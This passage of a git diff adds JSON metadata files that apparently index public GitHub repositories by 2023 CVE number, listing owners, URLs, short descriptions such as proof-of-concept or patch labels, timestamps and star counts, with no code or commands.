+ "created_at": "2023-04-25T19:27:53Z", + "updated_at": "2023-04-25T19:27:54Z", + "pushed_at": "2023-11-01T18:11:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 645519272, + "name": "CVE-2023-25292", + "full_name": "tucommenceapousser\/CVE-2023-25292", + "owner": { + "login": "tucommenceapousser", + "id": 129875733, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129875733?v=4", + "html_url": "https:\/\/github.com\/tucommenceapousser", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tucommenceapousser\/CVE-2023-25292", + "description": null, + "fork": false, + "created_at": "2023-05-25T20:56:01Z", + "updated_at": "2023-05-25T20:56:01Z", + "pushed_at": "2023-05-25T20:56:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-25355.json b/2023/CVE-2023-25355.json new file mode 100644 index 0000000000..8b747d35eb --- /dev/null +++ b/2023/CVE-2023-25355.json @@ -0,0 +1,33 @@ +[ + { + "id": 852173619, + "name": "CVE-2023-25355-25356", + "full_name": "glefait\/CVE-2023-25355-25356", + "owner": { + "login": "glefait", + "id": 7490317, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7490317?v=4", + "html_url": "https:\/\/github.com\/glefait", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/glefait\/CVE-2023-25355-25356", + "description": "CVE-2023-25355 and CVE-2023-25356 with automated service reload", + "fork": false, + "created_at": "2024-09-04T11:00:23Z", + "updated_at": "2024-09-23T13:17:53Z", + "pushed_at": "2024-09-04T15:06:13Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-25581.json b/2023/CVE-2023-25581.json new file mode 100644 index 0000000000..7dbd61038b --- /dev/null +++ b/2023/CVE-2023-25581.json @@ -0,0 +1,33 @@ +[ + { + "id": 873299415, + "name": "CVE-2023-25581", + "full_name": "p33d\/CVE-2023-25581", + "owner": { + "login": "p33d", + "id": 123099747, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/123099747?v=4", + "html_url": "https:\/\/github.com\/p33d", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/p33d\/CVE-2023-25581", + "description": null, + "fork": false, + "created_at": "2024-10-15T23:51:52Z", + "updated_at": "2024-10-16T00:03:25Z", + "pushed_at": "2024-10-16T00:03:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-25610.json b/2023/CVE-2023-25610.json new file mode 100644 index 0000000000..1927f32854 --- /dev/null +++ b/2023/CVE-2023-25610.json @@ -0,0 +1,33 @@ +[ + { + "id": 654862635, + "name": "CVE-2023-25610", + "full_name": "qi4L\/CVE-2023-25610", + "owner": { + "login": "qi4L", + "id": 75202638, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75202638?v=4", + "html_url": "https:\/\/github.com\/qi4L", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/qi4L\/CVE-2023-25610", + "description": "FortiOS 管理界面中的堆内存下溢导致远程代码执行", + "fork": false, + "created_at": "2023-06-17T06:57:28Z", + "updated_at": "2024-10-29T09:53:40Z", + "pushed_at": "2023-06-21T13:48:25Z", + "stargazers_count": 24, + "watchers_count": 24, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 24, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-25690.json b/2023/CVE-2023-25690.json new file mode 100644 index 0000000000..5d92dc61c4 --- /dev/null +++ b/2023/CVE-2023-25690.json @@ -0,0 +1,107 @@ +[ + { + "id": 632567622, + "name": "linux-apache-fix-mod_rewrite-spaceInURL", + "full_name": "tbachvarova\/linux-apache-fix-mod_rewrite-spaceInURL", + "owner": { + "login": "tbachvarova", + "id": 67585619, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67585619?v=4", + "html_url": "https:\/\/github.com\/tbachvarova", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tbachvarova\/linux-apache-fix-mod_rewrite-spaceInURL", + "description": "Fix URL containing SPACES after Apache upgrade CVE-2023-25690", + "fork": false, + "created_at": "2023-04-25T17:15:54Z", + "updated_at": "2024-04-15T22:08:03Z", + "pushed_at": "2023-04-25T21:38:16Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "apache", + "fix", + "url" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 643727682, + "name": "CVE-2023-25690-POC", + "full_name": "dhmosfunk\/CVE-2023-25690-POC", + "owner": { + "login": "dhmosfunk", + "id": 45040001, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45040001?v=4", + "html_url": "https:\/\/github.com\/dhmosfunk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dhmosfunk\/CVE-2023-25690-POC", + "description": "CVE 2023 25690 Proof of concept - mod_proxy vulnerable configuration on Apache HTTP Server versions 2.4.0 - 2.4.55 leads to HTTP Request Smuggling vulnerability.", + "fork": false, + "created_at": "2023-05-22T03:06:31Z", + "updated_at": "2024-12-29T08:05:37Z", + "pushed_at": "2024-08-24T13:38:50Z", + "stargazers_count": 276, + "watchers_count": 276, + "has_discussions": false, + "forks_count": 38, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "apache2", + "cve", + "cve-2023-25690-poc", + "http-request-smuggling", + "http-request-splitting", + "httpd", + "poc" + ], + "visibility": "public", + "forks": 38, + "watchers": 276, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 727337033, + "name": "CVE-2023-25690", + "full_name": "thanhlam-attt\/CVE-2023-25690", + "owner": { + "login": "thanhlam-attt", + "id": 79523444, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79523444?v=4", + "html_url": "https:\/\/github.com\/thanhlam-attt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thanhlam-attt\/CVE-2023-25690", + "description": null, + "fork": false, + "created_at": "2023-12-04T16:58:53Z", + "updated_at": "2024-12-02T14:27:34Z", + "pushed_at": "2023-12-05T16:04:42Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-25725.json b/2023/CVE-2023-25725.json new file mode 100644 index 0000000000..be4c01f6cc --- /dev/null +++ b/2023/CVE-2023-25725.json @@ -0,0 +1,33 @@ +[ + { + "id": 681930748, + "name": "LAB-CVE-2023-25725", + "full_name": "sgwgsw\/LAB-CVE-2023-25725", + "owner": { + "login": "sgwgsw", + "id": 43614862, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43614862?v=4", + "html_url": "https:\/\/github.com\/sgwgsw", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sgwgsw\/LAB-CVE-2023-25725", + "description": "Lab environment to test CVE-2023-25725", + "fork": false, + "created_at": "2023-08-23T04:32:54Z", + "updated_at": "2023-08-23T16:53:12Z", + "pushed_at": "2023-08-23T17:02:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-2579.json b/2023/CVE-2023-2579.json new file mode 100644 index 0000000000..00bc5c94b8 --- /dev/null +++ b/2023/CVE-2023-2579.json @@ -0,0 +1,39 @@ +[ + { + "id": 630988412, + "name": "poc-cve-xss-inventory-press-plugin", + "full_name": "0xn4d\/poc-cve-xss-inventory-press-plugin", + "owner": { + "login": "0xn4d", + "id": 85083396, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/85083396?v=4", + "html_url": "https:\/\/github.com\/0xn4d", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xn4d\/poc-cve-xss-inventory-press-plugin", + "description": "PoC for CVE-2023-2579", + "fork": false, + "created_at": "2023-04-21T16:22:10Z", + "updated_at": "2023-05-30T13:33:40Z", + "pushed_at": "2023-06-23T10:50:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cross-site-scripting", + "cve-2023-2579", + "inventory-press-plugin", + "wordpress", + "xss" + ], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-25813.json b/2023/CVE-2023-25813.json new file mode 100644 index 0000000000..50e6616c7b --- /dev/null +++ b/2023/CVE-2023-25813.json @@ -0,0 +1,157 @@ +[ + { + "id": 789840283, + "name": "Sequelize-1day-CVE-2023-25813", + "full_name": "bde574786\/Sequelize-1day-CVE-2023-25813", + "owner": { + "login": "bde574786", + "id": 102010541, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102010541?v=4", + "html_url": "https:\/\/github.com\/bde574786", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bde574786\/Sequelize-1day-CVE-2023-25813", + "description": null, + "fork": false, + "created_at": "2024-04-21T17:39:05Z", + "updated_at": "2024-04-28T03:51:43Z", + "pushed_at": "2024-04-28T03:51:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 835791874, + "name": "CVE-2023-25813", + "full_name": "White-BAO\/CVE-2023-25813", + "owner": { + "login": "White-BAO", + "id": 170318931, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/170318931?v=4", + "html_url": "https:\/\/github.com\/White-BAO", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/White-BAO\/CVE-2023-25813", + "description": "12", + "fork": false, + "created_at": "2024-07-30T14:36:48Z", + "updated_at": "2024-08-04T07:05:51Z", + "pushed_at": "2024-08-04T05:26:47Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 884065369, + "name": "CVE-2023-25813", + "full_name": "pbj2647\/CVE-2023-25813", + "owner": { + "login": "pbj2647", + "id": 151702008, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/151702008?v=4", + "html_url": "https:\/\/github.com\/pbj2647", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pbj2647\/CVE-2023-25813", + "description": null, + "fork": false, + "created_at": "2024-11-06T04:28:36Z", + "updated_at": "2024-11-07T15:21:16Z", + "pushed_at": "2024-11-07T15:20:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 884862453, + "name": "CVE-2023-25813", + "full_name": "wxuycea\/CVE-2023-25813", + "owner": { + "login": "wxuycea", + "id": 129142444, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129142444?v=4", + "html_url": "https:\/\/github.com\/wxuycea", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wxuycea\/CVE-2023-25813", + "description": "CVE-2023-25813 Vulnerability Reproduction - SQL Injection in Sequelize", + "fork": false, + "created_at": "2024-11-07T14:21:38Z", + "updated_at": "2024-11-10T06:14:15Z", + "pushed_at": "2024-11-10T06:14:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 885806935, + "name": "cve-2023-25813", + "full_name": "sea-middle\/cve-2023-25813", + "owner": { + "login": "sea-middle", + "id": 179393914, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/179393914?v=4", + "html_url": "https:\/\/github.com\/sea-middle", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sea-middle\/cve-2023-25813", + "description": null, + "fork": false, + "created_at": "2024-11-09T12:57:46Z", + "updated_at": "2024-11-09T12:59:52Z", + "pushed_at": "2024-11-09T12:59:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-2591.json b/2023/CVE-2023-2591.json new file mode 100644 index 0000000000..bfa95beeec --- /dev/null +++ b/2023/CVE-2023-2591.json @@ -0,0 +1,33 @@ +[ + { + "id": 644828673, + "name": "CVE-2023-2591", + "full_name": "mnqazi\/CVE-2023-2591", + "owner": { + "login": "mnqazi", + "id": 32686360, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32686360?v=4", + "html_url": "https:\/\/github.com\/mnqazi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mnqazi\/CVE-2023-2591", + "description": "CVE-2023-2591 Medium blog", + "fork": false, + "created_at": "2023-05-24T10:45:22Z", + "updated_at": "2023-05-24T10:57:53Z", + "pushed_at": "2023-05-24T10:56:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-2594.json b/2023/CVE-2023-2594.json new file mode 100644 index 0000000000..42414c6f0a --- /dev/null +++ b/2023/CVE-2023-2594.json @@ -0,0 +1,33 @@ +[ + { + "id": 638797642, + "name": "CVE-2023-2594", + "full_name": "thehackingverse\/CVE-2023-2594", + "owner": { + "login": "thehackingverse", + "id": 86924237, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86924237?v=4", + "html_url": "https:\/\/github.com\/thehackingverse", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thehackingverse\/CVE-2023-2594", + "description": "A vulnerability, which was classified as critical, was found in SourceCodester Food Ordering Management System 1.0. Affected is an unknown function of the component Registration. The manipulation of the argument username leads to sql injection. It is possible to launch the attack remotely. The identifier of this vulnerability is VDB-228396.", + "fork": false, + "created_at": "2023-05-10T06:07:43Z", + "updated_at": "2023-05-11T02:55:03Z", + "pushed_at": "2023-05-10T06:10:42Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-25950.json b/2023/CVE-2023-25950.json new file mode 100644 index 0000000000..ec89d391bf --- /dev/null +++ b/2023/CVE-2023-25950.json @@ -0,0 +1,42 @@ +[ + { + "id": 673126374, + "name": "HTTP3ONSTEROIDS", + "full_name": "dhmosfunk\/HTTP3ONSTEROIDS", + "owner": { + "login": "dhmosfunk", + "id": 45040001, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45040001?v=4", + "html_url": "https:\/\/github.com\/dhmosfunk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dhmosfunk\/HTTP3ONSTEROIDS", + "description": "HTTP3ONSTEROIDS - A research on CVE-2023-25950 where HAProxy's HTTP\/3 implementation fails to block a malformed HTTP header field name.", + "fork": false, + "created_at": "2023-07-31T23:57:02Z", + "updated_at": "2024-04-03T09:08:33Z", + "pushed_at": "2024-02-10T04:30:45Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-25950", + "cve-2023-25950-poc", + "dos", + "haproxy", + "http-request-smuggling", + "http3", + "http3onsteroids", + "poc" + ], + "visibility": "public", + "forks": 2, + "watchers": 10, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-2598.json b/2023/CVE-2023-2598.json new file mode 100644 index 0000000000..2eb2399f98 --- /dev/null +++ b/2023/CVE-2023-2598.json @@ -0,0 +1,95 @@ +[ + { + "id": 719803136, + "name": "io_uring_LPE-CVE-2023-2598", + "full_name": "ysanatomic\/io_uring_LPE-CVE-2023-2598", + "owner": { + "login": "ysanatomic", + "id": 41269324, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41269324?v=4", + "html_url": "https:\/\/github.com\/ysanatomic", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ysanatomic\/io_uring_LPE-CVE-2023-2598", + "description": "LPE PoC of a vulnerability in the io_uring subsystem of the Linux Kernel.", + "fork": false, + "created_at": "2023-11-16T23:41:27Z", + "updated_at": "2025-01-06T00:51:17Z", + "pushed_at": "2023-11-23T18:37:18Z", + "stargazers_count": 89, + "watchers_count": 89, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 89, + "score": 0, + "subscribers_count": 7 + }, + { + "id": 850252202, + "name": "CVE-2023-2598", + "full_name": "cainiao159357\/CVE-2023-2598", + "owner": { + "login": "cainiao159357", + "id": 76136742, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76136742?v=4", + "html_url": "https:\/\/github.com\/cainiao159357", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cainiao159357\/CVE-2023-2598", + "description": null, + "fork": false, + "created_at": "2024-08-31T09:14:53Z", + "updated_at": "2024-08-31T09:51:37Z", + "pushed_at": "2024-08-31T09:51:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 884497009, + "name": "CVE-2023-2598", + "full_name": "LLfam\/CVE-2023-2598", + "owner": { + "login": "LLfam", + "id": 43279891, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43279891?v=4", + "html_url": "https:\/\/github.com\/LLfam", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LLfam\/CVE-2023-2598", + "description": null, + "fork": false, + "created_at": "2024-11-06T21:24:43Z", + "updated_at": "2024-11-06T21:27:24Z", + "pushed_at": "2024-11-06T21:27:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-2603.json b/2023/CVE-2023-2603.json new file mode 100644 index 0000000000..4bed8b00fe --- /dev/null +++ b/2023/CVE-2023-2603.json @@ -0,0 +1,33 @@ +[ + { + "id": 887105666, + "name": "external_libcap-Android10_r33_CVE-2023-2603", + "full_name": "Pazhanivelmani\/external_libcap-Android10_r33_CVE-2023-2603", + "owner": { + "login": "Pazhanivelmani", + "id": 178174306, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/178174306?v=4", + "html_url": "https:\/\/github.com\/Pazhanivelmani", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Pazhanivelmani\/external_libcap-Android10_r33_CVE-2023-2603", + "description": null, + "fork": false, + "created_at": "2024-11-12T07:12:16Z", + "updated_at": "2024-11-12T07:16:43Z", + "pushed_at": "2024-11-12T07:16:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-26035.json b/2023/CVE-2023-26035.json new file mode 100644 index 0000000000..1db5d39861 --- /dev/null +++ b/2023/CVE-2023-26035.json @@ -0,0 +1,170 @@ +[ + { + "id": 730370673, + "name": "CVE-2023-26035", + "full_name": "rvizx\/CVE-2023-26035", + "owner": { + "login": "rvizx", + "id": 84989569, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84989569?v=4", + "html_url": "https:\/\/github.com\/rvizx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rvizx\/CVE-2023-26035", + "description": "Unauthenticated RCE in ZoneMinder Snapshots - Poc Exploit", + "fork": false, + "created_at": "2023-12-11T19:23:13Z", + "updated_at": "2024-09-21T19:48:17Z", + "pushed_at": "2024-05-07T03:32:04Z", + "stargazers_count": 18, + "watchers_count": 18, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-26035", + "exploit" + ], + "visibility": "public", + "forks": 2, + "watchers": 18, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 730727782, + "name": "zoneminder-snapshots-rce-poc", + "full_name": "m3m0o\/zoneminder-snapshots-rce-poc", + "owner": { + "login": "m3m0o", + "id": 130102748, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/130102748?v=4", + "html_url": "https:\/\/github.com\/m3m0o", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/m3m0o\/zoneminder-snapshots-rce-poc", + "description": "This is a script written in Python that allows the exploitation of the Zoneminder's security flaw described in CVE-2023-26035. ", + "fork": false, + "created_at": "2023-12-12T14:44:19Z", + "updated_at": "2024-07-07T17:46:07Z", + "pushed_at": "2024-07-07T17:46:04Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2023-26035", + "rce-exploit", + "zoneminder" + ], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 731218902, + "name": "CVE-2023-26035", + "full_name": "heapbytes\/CVE-2023-26035", + "owner": { + "login": "heapbytes", + "id": 56447720, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56447720?v=4", + "html_url": "https:\/\/github.com\/heapbytes", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/heapbytes\/CVE-2023-26035", + "description": "POC script for CVE-2023-26035 (zoneminder 1.36.32) ", + "fork": false, + "created_at": "2023-12-13T15:40:24Z", + "updated_at": "2024-10-28T12:18:44Z", + "pushed_at": "2024-09-08T06:55:25Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-26035", + "exploit", + "poc", + "zoneminder" + ], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 735320790, + "name": "CVE-2023-26035", + "full_name": "Yuma-Tsushima07\/CVE-2023-26035", + "owner": { + "login": "Yuma-Tsushima07", + "id": 63207324, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63207324?v=4", + "html_url": "https:\/\/github.com\/Yuma-Tsushima07", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Yuma-Tsushima07\/CVE-2023-26035", + "description": "ZoneMinder Snapshots - Unauthenticated", + "fork": false, + "created_at": "2023-12-24T13:37:39Z", + "updated_at": "2023-12-25T14:33:51Z", + "pushed_at": "2023-12-24T13:55:28Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 736382730, + "name": "zoneminder_CVE-2023-26035", + "full_name": "0xfalafel\/zoneminder_CVE-2023-26035", + "owner": { + "login": "0xfalafel", + "id": 4268373, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4268373?v=4", + "html_url": "https:\/\/github.com\/0xfalafel", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xfalafel\/zoneminder_CVE-2023-26035", + "description": "Exploit for CVE-2023-26035 affecting ZoneMinder < 1.36.33 and < 1.37.33", + "fork": false, + "created_at": "2023-12-27T18:44:22Z", + "updated_at": "2024-02-15T05:49:30Z", + "pushed_at": "2023-12-27T21:08:50Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-26048.json b/2023/CVE-2023-26048.json new file mode 100644 index 0000000000..e8c5ccc2b7 --- /dev/null +++ b/2023/CVE-2023-26048.json @@ -0,0 +1,64 @@ +[ + { + "id": 712774895, + "name": "jetty_9.4.31_CVE-2023-26048", + "full_name": "Trinadh465\/jetty_9.4.31_CVE-2023-26048", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/jetty_9.4.31_CVE-2023-26048", + "description": null, + "fork": false, + "created_at": "2023-11-01T06:57:10Z", + "updated_at": "2023-11-01T10:21:01Z", + "pushed_at": "2023-11-01T12:09:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 723994552, + "name": "Jetty-v9.4.31_CVE-2023-26048", + "full_name": "hshivhare67\/Jetty-v9.4.31_CVE-2023-26048", + "owner": { + "login": "hshivhare67", + "id": 67005408, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67005408?v=4", + "html_url": "https:\/\/github.com\/hshivhare67", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hshivhare67\/Jetty-v9.4.31_CVE-2023-26048", + "description": null, + "fork": false, + "created_at": "2023-11-27T07:19:49Z", + "updated_at": "2023-11-27T07:20:44Z", + "pushed_at": "2023-11-27T07:23:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-26049.json b/2023/CVE-2023-26049.json new file mode 100644 index 0000000000..f1c063d506 --- /dev/null +++ b/2023/CVE-2023-26049.json @@ -0,0 +1,33 @@ +[ + { + "id": 723996800, + "name": "Jetty_v9.4.31_CVE-2023-26049", + "full_name": "hshivhare67\/Jetty_v9.4.31_CVE-2023-26049", + "owner": { + "login": "hshivhare67", + "id": 67005408, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67005408?v=4", + "html_url": "https:\/\/github.com\/hshivhare67", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hshivhare67\/Jetty_v9.4.31_CVE-2023-26049", + "description": null, + "fork": false, + "created_at": "2023-11-27T07:25:34Z", + "updated_at": "2024-03-20T11:38:27Z", + "pushed_at": "2024-03-20T11:39:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-26067.json b/2023/CVE-2023-26067.json new file mode 100644 index 0000000000..51638a5246 --- /dev/null +++ b/2023/CVE-2023-26067.json @@ -0,0 +1,33 @@ +[ + { + "id": 